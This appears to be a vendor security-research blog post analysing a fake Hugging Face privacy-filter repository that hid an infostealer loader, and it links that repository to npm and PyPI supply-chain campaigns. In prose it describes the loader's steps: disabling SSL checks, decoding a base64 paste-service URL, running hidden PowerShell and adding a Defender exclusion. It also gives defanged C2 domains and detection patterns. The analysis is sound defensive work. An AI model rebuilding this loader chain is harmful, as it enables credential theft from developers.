Buried inside was a function called _verify_checksum_integrity(). It disabled SSL verification, decoded a base64 URL pointing to jsonkeeper.com (a public JSON paste service), fetched a JSON payload containing a PowerShell command, and executed it in a hidden window
SPR{K3 Security Research · May 2026
https://thehackernews.com/2026/05/fake-openai-privacy-filter-repo-hits-1.html
On May 7, a repository called Open-OSS/privacy-filter hit the #1 trending spot on Hugging Face. It had 244,000 downloads and 667 likes. It was a near-verbatim copy of OpenAI’s legitimate Privacy Filter release — the open-weight PII redaction model published under Apache 2.0 in late April.
It was also a six-stage infostealer.
HiddenLayer identified it, Hugging Face pulled it, and the security community published the IOCs. But the incident is not about one bad repository. It is about a structural gap in how the AI ecosystem handles trust — and it connects to a broader campaign that spans HuggingFace, npm, and PyPI simultaneously.
The Attack Chain
The repository shipped a loader.py that looked legitimate — a DummyModel class, synthetic training data, realistic console output. It appeared to be a standard model loader.
Buried inside was a function called _verify_checksum_integrity(). It disabled SSL verification, decoded a base64 URL pointing to jsonkeeper.com (a public JSON paste service), fetched a JSON payload containing a PowerShell command, and executed it in a hidden window. The entire block was wrapped in a bare except so failures were silent.
The use of jsonkeeper.com as a dead drop resolver is the operational detail that matters. The attacker can rotate payloads without modifying the repository. The repo stays clean-looking while the kill chain updates dynamically.
The PowerShell command fetched a second script from a domain impersonating a blockchain analytics API, which downloaded the actual payload — a Rust-based infostealer — added it to Windows Defender’s exclusion list, and launched it at SYSTEM-level privileges via a self-deleting scheduled task.
The infostealer itself was thorough: Chromium and Firefox browsers (passwords, session cookies, encryption keys), Discord tokens, cryptocurrency wallets, SSH/FTP/VPN credentials, local files, and multi-monitor screenshots. Everything compressed and exfiltrated to a C2 server. The binary included anti-analysis for VirtualBox, VMware, QEMU, and Xen, plus AMSI and ETW disabling.
The 244,000 downloads were almost certainly inflated. HiddenLayer found 504 accounts following a firstname-lastname###pattern and 153 following adjectivenoun####. The trending rank was manufactured. But manufactured visibility is the point — it gets the repository into the feeds of developers who trust the platform’s trending signal.
The Infrastructure Overlap
This is where it stops being an isolated incident.
HiddenLayer found that the api[.]eth-fastscan[.]org domain used in the HuggingFace campaign also served a different executable that beacons to welovechinatown[.]info — a C2 server previously used in an npm typosquatting campaign. A malicious npm package called trevlo delivered ValleyRAT (Winos 4.0), a post-exploitation framework previously distributed exclusively through fake gaming utilities targeting Chinese and Vietnamese-speaking users.
The npm delivery was a first. It marked an expansion from consumer-targeted malware into developer-targeted supply chain operations. The welovechinatown[.]info domain was registered April 21, less than 18 hours before trevlo@4.0.0 was published to npm.
HiddenLayer also identified six additional Hugging Face repositories under a separate account using identical loader logic and shared infrastructure, plus links to fake AI packages on PyPI.
Same infrastructure. Multiple ecosystems. Coordinated timing.
The Broader May 2026 Supply Chain Landscape
The HuggingFace incident didn’t happen in isolation. May 2026 has been one of the most active months for developer supply chain attacks on record.
March 31: The axios npm package — 100 million weekly downloads — was backdoored via a hijacked maintainer account. Two malicious versions were live for approximately three hours, deploying a cross-platform RAT.
April 22: TeamPCP published a malicious @bitwarden/cli package on npm as part of the Shai-Hulud campaign, targeting developer credential chains.
April 29: Mini Shai-Hulud hit SAP’s CAP Model ecosystem — four compromised packages with approximately 570,000 combined weekly downloads.
May 7: The HuggingFace Open-OSS/privacy-filter incident.
May 12: 84 malicious TanStack packages published in six minutes via GitHub Actions cache poisoning, with triple-redundant exfiltration through a typosquat domain, the Session messenger network, and GitHub API dead drops using stolen tokens.
The pattern is clear: attackers are treating developer workflow infrastructure — package registries, model repositories, CI/CD pipelines — as the primary attack surface, not an ancillary one.
What This Means for ML Infrastructure
The attack vector was not the model weights. It was loader.py, start.bat, and the README that told developers to clone and run. The model card is the social engineering. The setup script is the payload.
Our static scanner detects this class of attack: malicious instructions embedded in repository artifacts that trick developers into executing payloads. After this incident, we extended coverage to loader scripts directly — base64-to-exec chains, network fetch paired with subprocess calls, paste service C2 connections, hidden PowerShell invocations. Against a synthetic reproduction of the Open-OSS/privacy-filter payload, the scanner produces five CRITICAL findings before anyone runs anything.
On the runtime side, Defend’s behavioral correlator models the multi-stage sequence on the process lineage. SSL disable, base64 decode, paste service fetch, and hidden PowerShell each accumulate charge. In simulation, the correlator fires CRITICAL at stage four — when PowerShell spawns with a hidden window — before the Rust binary is written to disk. A separate rule catches the final stage independently: payload written, then payload executed.
No scanner catches the full picture. Ours detects the dropper chain inside the repo and the runtime attack sequence on the endpoint. What it doesn’t see — and no product on the market sees — is the shared C2 infrastructure linking this repo to the npm trevlo campaign and the six sibling repositories. That connection came from threat intel research, not automated tooling. Closing that gap is a cross-registry correlation problem, and it’s on the roadmap.
Operational Takeaways
For security teams running ML infrastructure:
Repository vetting is not optional. Verify publisher identity against the official organization. Check account age. Read the loader scripts before executing anything. The model card being identical to the real one is the tell, not the assurance.
Trending rank is not trust. The HuggingFace trending algorithm was gamed with automated accounts. Popularity metrics on any open registry are an attack surface, not a security signal.
Isolate model evaluation. Never clone and execute model repository code on a development workstation with access to credentials, wallets, or SSH keys. Use a disposable VM or container with no persistent state.
Monitor for infrastructure overlap. The connection between the HuggingFace and npm campaigns was found through shared C2 infrastructure. If your threat intel pipeline doesn’t correlate across model registries, package managers, and CI/CD systems simultaneously, you’re seeing fragments of coordinated campaigns and treating them as isolated incidents.
The model delivery pipeline is the attack surface. Not the model. Not the weights. The scripts, configs, and instructions that surround the model. This is the layer that needs continuous monitoring — and it’s the layer that traditional AI red teaming tools don’t reach.
SPR{K3 Security Research discovers and discloses vulnerabilities in ML/AI infrastructure. Defend’s runtime agent monitors process execution chains in ML environments; the static scanner detects doc-driven payload execution in repository artifacts. 12 NVIDIA CVEs confirmed across 3 security bulletins. defend.sprk3.com
System D 